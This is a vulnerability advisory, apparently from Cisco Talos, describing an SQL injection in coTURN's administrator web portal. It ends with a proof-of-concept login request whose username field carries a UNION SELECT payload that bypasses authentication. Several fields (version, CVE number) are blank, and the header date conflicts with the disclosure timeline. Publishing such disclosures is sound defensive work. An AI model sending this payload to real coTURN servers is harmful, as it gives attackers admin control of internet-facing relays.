Talos Vulnerability Report


coTURN Administrator Web Portal SQL injection vulnerability

January 29, 2018
CVE Number



An exploitable SQL injection vulnerability exists in the administrator web portal function of coTURN prior to version A login message with a specially crafted username can cause an SQL injection, resulting in authentication bypass, which could give access to the TURN server administrator web portal. An attacker can log in via the external interface of the TURN server to trigger this vulnerability.

Tested Versions


Product URLs


CVSSv3 Score

9.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H


CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)


coTURN is an open-source implementation of TURN and STUN servers that can be used as a general-purpose networking traffic TURN server. TURN servers are usually deployed in so-called “DMZ” zones — any server reachable by the internet — to provide firewall traversal solutions. Attackers who are able to take over such servers may be able to bypass firewalls and conduct additional attacks.

According to Shodawn, thousands of coTURN servers are directly reachable on the internet.

The username in POST requests to the login page is passed to the following function in src/apps/relay/dbdrivers/dbd_mysql.c src/apps/relay/dbdrivers/dbd_pgsql.c src/apps/relay/dbdrivers/dbd_sqlite.c

snprintf(statement, sizeof(statement), "select realm,password from admin_user where name='%s'", usname);

The usname element can be crafted to return an arbitrary password.

Even when no administrators are configured and the administrator web portal is deactivated, the portal still accepts POST requests, so it’s still possible to exploit this vulnerability and reactivate the portal.

Exploit proof of concept

POST /logon HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

uname=user' union select '','0000'; --&pwd=0000


2017-09-04 - Vendor Disclosure
2019-01-29 - Public Disclosure


Discovered by Nicolas Edet of Cisco.